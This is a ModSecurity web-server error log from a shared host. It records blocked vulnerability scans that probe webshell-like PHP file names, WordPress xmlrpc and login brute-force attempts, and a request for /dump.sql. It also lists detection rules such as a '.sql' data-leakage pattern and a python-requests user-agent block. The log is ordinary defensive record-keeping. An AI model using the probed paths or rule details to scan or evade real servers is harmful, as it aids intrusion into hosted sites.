[Tue May 26 16:11:34.423260 2026] [security2:error] [pid 773493:tid 773659] [client 20.196.127.68:16896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahV43pgy-Vk4jSdqTCRTZAAAAKk"]
[Tue May 26 16:11:34.617634 2026] [security2:error] [pid 773493:tid 773744] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV43pgy-Vk4jSdqTCRTWgAAAP4"]
[Tue May 26 16:11:35.081085 2026] [security2:error] [pid 773493:tid 773654] [client 20.196.127.68:17477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahV435gy-Vk4jSdqTCRTbgAAAKQ"]
[Tue May 26 16:11:36.678180 2026] [security2:error] [pid 773493:tid 773671] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV44Jgy-Vk4jSdqTCRTkQAAALU"]
[Tue May 26 16:11:36.720315 2026] [security2:error] [pid 773493:tid 773731] [client 20.196.127.68:13465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/content.php"] [unique_id "ahV44Jgy-Vk4jSdqTCRTmAAAAPE"]
[Tue May 26 16:11:36.786433 2026] [security2:error] [pid 773493:tid 773627] [client 94.16.115.121:32464] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "lmialumni.org"] [uri "/dump.sql"] [unique_id "ahV44Jgy-Vk4jSdqTCRTmQAAAIk"], referer: lmialumni.org/dump.sql
[Tue May 26 16:11:37.343861 2026] [security2:error] [pid 773493:tid 773650] [client 20.196.127.68:13497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahV44Zgy-Vk4jSdqTCRTpAAAAKA"]
[Tue May 26 16:11:37.989540 2026] [security2:error] [pid 773493:tid 773656] [client 20.196.127.68:16921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV44Zgy-Vk4jSdqTCRTtwAAAKY"]
[Tue May 26 16:11:38.061968 2026] [security2:error] [pid 773493:tid 773660] [client 68.183.190.139:63321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahV44Zgy-Vk4jSdqTCRTswAAAKo"]
[Tue May 26 16:11:38.062104 2026] [security2:error] [pid 773493:tid 773660] [client 68.183.190.139:63321] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahV44Zgy-Vk4jSdqTCRTswAAAKo"]
[Tue May 26 16:11:38.654608 2026] [security2:error] [pid 773493:tid 773657] [client 20.196.127.68:13639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahV44pgy-Vk4jSdqTCRTzQAAAKc"]
[Tue May 26 16:11:38.692533 2026] [security2:error] [pid 773493:tid 773745] [client 68.183.190.139:63341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahV44pgy-Vk4jSdqTCRTzgAAAP8"]
[Tue May 26 16:11:38.692693 2026] [security2:error] [pid 773493:tid 773745] [client 68.183.190.139:63341] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahV44pgy-Vk4jSdqTCRTzgAAAP8"]
[Tue May 26 16:11:38.795226 2026] [security2:error] [pid 773493:tid 773719] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV44pgy-Vk4jSdqTCRTxAAAAOU"]
[Tue May 26 16:11:39.273375 2026] [security2:error] [pid 773493:tid 773727] [client 20.196.127.68:16955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/doc.php"] [unique_id "ahV445gy-Vk4jSdqTCRT2QAAAO0"]
[Tue May 26 16:11:39.934528 2026] [security2:error] [pid 773493:tid 773634] [client 20.196.127.68:13327] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/elp.php"] [unique_id "ahV445gy-Vk4jSdqTCRT4QAAAJA"]
[Tue May 26 16:11:40.364607 2026] [security2:error] [pid 773493:tid 773656] [client 68.183.190.139:63359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahV45Jgy-Vk4jSdqTCRT8gAAAKY"]
[Tue May 26 16:11:40.364779 2026] [security2:error] [pid 773493:tid 773656] [client 68.183.190.139:63359] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahV45Jgy-Vk4jSdqTCRT8gAAAKY"]
[Tue May 26 16:11:40.365709 2026] [security2:error] [pid 773493:tid 773631] [client 106.219.85.83:5814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV45Jgy-Vk4jSdqTCRT7gAAAI0"]
[Tue May 26 16:11:40.365806 2026] [security2:error] [pid 773493:tid 773631] [client 106.219.85.83:5814] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV45Jgy-Vk4jSdqTCRT7gAAAI0"]
[Tue May 26 16:11:40.604275 2026] [security2:error] [pid 773493:tid 773664] [client 20.196.127.68:13349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/Exception-class.php"] [unique_id "ahV45Jgy-Vk4jSdqTCRT-QAAAK4"]
[Tue May 26 16:11:40.712415 2026] [security2:error] [pid 773493:tid 773704] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV45Jgy-Vk4jSdqTCRT8QAAANY"]
[Tue May 26 16:11:41.189749 2026] [security2:error] [pid 773493:tid 773722] [client 20.196.127.68:13468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/ee.php"] [unique_id "ahV45Zgy-Vk4jSdqTCRUAwAAAOg"]
[Tue May 26 16:11:41.837670 2026] [security2:error] [pid 773493:tid 773643] [client 20.196.127.68:13370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahV45Zgy-Vk4jSdqTCRUEAAAAJk"]
[Tue May 26 16:11:42.221055 2026] [security2:error] [pid 773493:tid 773509] [remote 74.7.241.58:47488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV45pgy-Vk4jSdqTCRUFgAAng8"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/id
[Tue May 26 16:11:42.417466 2026] [security2:error] [pid 773493:tid 773683] [client 20.196.127.68:13658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/f35.php"] [unique_id "ahV45pgy-Vk4jSdqTCRUHwAAAME"]
[Tue May 26 16:11:42.652642 2026] [security2:error] [pid 773493:tid 773740] [client 62.60.130.233:59328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV45pgy-Vk4jSdqTCRUIAAAAPo"]
[Tue May 26 16:11:42.780082 2026] [security2:error] [pid 773493:tid 773687] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV45pgy-Vk4jSdqTCRUHAAAAMU"]
[Tue May 26 16:11:42.994660 2026] [security2:error] [pid 773493:tid 773694] [client 62.60.130.233:55020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV45pgy-Vk4jSdqTCRUKAAAAMw"]
[Tue May 26 16:11:43.040189 2026] [security2:error] [pid 773493:tid 773676] [client 20.196.127.68:2443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/fff.php"] [unique_id "ahV455gy-Vk4jSdqTCRULQAAALo"]
[Tue May 26 16:11:43.061016 2026] [core:crit] [pid 773493:tid 773711] (13)Permission denied: [client 52.167.144.190:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:11:43.178254 2026] [security2:error] [pid 773493:tid 773634] [client 103.44.52.196:52864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV455gy-Vk4jSdqTCRUMQAAAJA"]
[Tue May 26 16:11:43.178385 2026] [security2:error] [pid 773493:tid 773634] [client 103.44.52.196:52864] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV455gy-Vk4jSdqTCRUMQAAAJA"]
[Tue May 26 16:11:43.227452 2026] [core:crit] [pid 773493:tid 773742] (13)Permission denied: [client 52.167.144.190:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:11:43.537375 2026] [core:crit] [pid 773493:tid 773719] (13)Permission denied: [client 52.167.144.190:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:11:43.655734 2026] [security2:error] [pid 773493:tid 773630] [client 20.196.127.68:13313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/ff1.php"] [unique_id "ahV455gy-Vk4jSdqTCRUPwAAAIw"]
[Tue May 26 16:11:44.315190 2026] [security2:error] [pid 773493:tid 773696] [client 20.196.127.68:13931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/flower.php"] [unique_id "ahV46Jgy-Vk4jSdqTCRUUAAAAM4"]
[Tue May 26 16:11:44.837856 2026] [security2:error] [pid 773493:tid 773705] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV46Jgy-Vk4jSdqTCRUVAAAANc"]
[Tue May 26 16:11:44.933358 2026] [security2:error] [pid 773493:tid 773700] [client 20.196.127.68:14566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahV46Jgy-Vk4jSdqTCRUZAAAANI"]
[Tue May 26 16:11:45.537499 2026] [security2:error] [pid 773493:tid 773652] [client 20.196.127.68:16907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahV46Zgy-Vk4jSdqTCRUcQAAAKI"]
[Tue May 26 16:11:46.048808 2026] [security2:error] [pid 773493:tid 773682] [client 134.195.101.193:15236] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "bhavisharchitects.com"] [uri "/wp-content/uploads/2019/12/Mr.Rajan-Residence-%40-Trichy.jpeg"] [unique_id "ahV46pgy-Vk4jSdqTCRUgwAAAMA"]
[Tue May 26 16:11:46.157694 2026] [security2:error] [pid 773493:tid 773703] [client 20.196.127.68:3029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/g.php"] [unique_id "ahV46pgy-Vk4jSdqTCRUiQAAANU"]
[Tue May 26 16:11:46.441142 2026] [security2:error] [pid 773493:tid 773723] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV46pgy-Vk4jSdqTCRUgQAAAOk"]
[Tue May 26 16:11:46.759562 2026] [security2:error] [pid 773493:tid 773700] [client 20.196.127.68:13640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahV46pgy-Vk4jSdqTCRUmAAAANI"]
[Tue May 26 16:11:47.341107 2026] [security2:error] [pid 773493:tid 773712] [client 20.196.127.68:16916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahV465gy-Vk4jSdqTCRUqAAAAN4"]
[Tue May 26 16:11:47.922764 2026] [security2:error] [pid 773493:tid 773662] [client 20.196.127.68:13682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/in.php"] [unique_id "ahV465gy-Vk4jSdqTCRUtwAAAKw"]
[Tue May 26 16:11:48.504259 2026] [security2:error] [pid 773493:tid 773703] [client 20.196.127.68:16908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahV47Jgy-Vk4jSdqTCRUwgAAANU"]
[Tue May 26 16:11:49.026376 2026] [security2:error] [pid 773493:tid 773653] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV47Jgy-Vk4jSdqTCRUxQAAAKM"]
[Tue May 26 16:11:49.170482 2026] [security2:error] [pid 773493:tid 773700] [client 20.196.127.68:13645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahV47Zgy-Vk4jSdqTCRUzQAAANI"]
[Tue May 26 16:11:49.767303 2026] [security2:error] [pid 773493:tid 773716] [client 20.196.127.68:16914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/item.php"] [unique_id "ahV47Zgy-Vk4jSdqTCRU1wAAAOI"]
[Tue May 26 16:11:49.831743 2026] [security2:error] [pid 773493:tid 773651] [client 106.206.207.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV47Zgy-Vk4jSdqTCRU0wAAAKE"]
[Tue May 26 16:11:50.363787 2026] [security2:error] [pid 773493:tid 773722] [client 20.196.127.68:16927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahV47pgy-Vk4jSdqTCRU4QAAAOg"]
[Tue May 26 16:11:50.824770 2026] [security2:error] [pid 773493:tid 773738] [client 106.219.85.83:30783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV47pgy-Vk4jSdqTCRU8gAAAPg"]
[Tue May 26 16:11:50.824868 2026] [security2:error] [pid 773493:tid 773738] [client 106.219.85.83:30783] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV47pgy-Vk4jSdqTCRU8gAAAPg"]
[Tue May 26 16:11:51.031462 2026] [security2:error] [pid 773493:tid 773670] [client 20.196.127.68:16899] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/license.php"] [unique_id "ahV475gy-Vk4jSdqTCRU-AAAALQ"]
[Tue May 26 16:11:51.100154 2026] [security2:error] [pid 773493:tid 773692] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV47pgy-Vk4jSdqTCRU7gAAAMo"]
[Tue May 26 16:11:51.694487 2026] [security2:error] [pid 773493:tid 773739] [client 20.196.127.68:16910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV475gy-Vk4jSdqTCRVBQAAAPk"]
[Tue May 26 16:11:52.278391 2026] [security2:error] [pid 773493:tid 773651] [client 20.196.127.68:14545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/manager.php"] [unique_id "ahV48Jgy-Vk4jSdqTCRVFQAAAKE"]
[Tue May 26 16:11:52.897434 2026] [security2:error] [pid 773493:tid 773749] [client 20.196.127.68:13914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/media.php"] [unique_id "ahV48Jgy-Vk4jSdqTCRVIgAAAQM"]
[Tue May 26 16:11:52.906636 2026] [core:crit] [pid 773493:tid 773686] (13)Permission denied: [client 207.46.13.51:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:11:53.266849 2026] [security2:error] [pid 773493:tid 773625] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV48Jgy-Vk4jSdqTCRVIAAAAIc"]
